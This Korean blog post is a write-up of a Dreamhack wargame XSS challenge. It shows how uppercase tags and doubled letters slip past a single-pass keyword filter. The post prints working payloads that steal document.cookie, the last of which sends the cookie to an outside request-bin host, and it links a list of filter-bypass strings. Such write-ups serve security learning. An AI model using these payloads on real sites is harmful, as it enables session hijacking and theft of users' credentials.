Security/Write Up
[Dreamhack] XSS Filtering Bypass
2er0127
2023. 5. 30. 18:30
필터링 우회를 이용한 XSS 문제이다.
내가 제일 좋아하는 xss 필터링 우회 리스트를 모아둔 깃허브 주소이다.
https://gist.github.com/seo1-say/4c68e83069d7269e6e7e2c994e1fcf92
XSS Filter Bypass List
XSS Filter Bypass List. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com
먼저 app.py 를 보면 다음과 같은 함수가 있다.
"script", "on", "javascript" 문자열이 있을 경우, 위 문자열을 없애는 필터링이 존재한다.
vuln 페이지에서 대문자 SCRIPT 문자열은 돌아간다는 것을 확인했다.
<SCRIPT>alert("XSS");</SCRIPT>
내가 사용할 코드는 다음과 같은데 문제는 location에 on도 필터링될 것이다.
<SCRIPT>location.href="/memo?memo="+document.cookie;</SCRIPT>
한 번 필터링하는 코드이기 때문에 해당 문자열을 두 번씩 주면 해결이 된다.
<SCRIPT>locatioonn.href="/memo?memo="+document.cookie;</SCRIPT>
서버를 이용한 코드는 아래와 같다.
<SCRIPT>locatioonn.href="https://gncplqf.request.dreamhack.games/?memo="+document.cookie;</SCRIPT>
728x90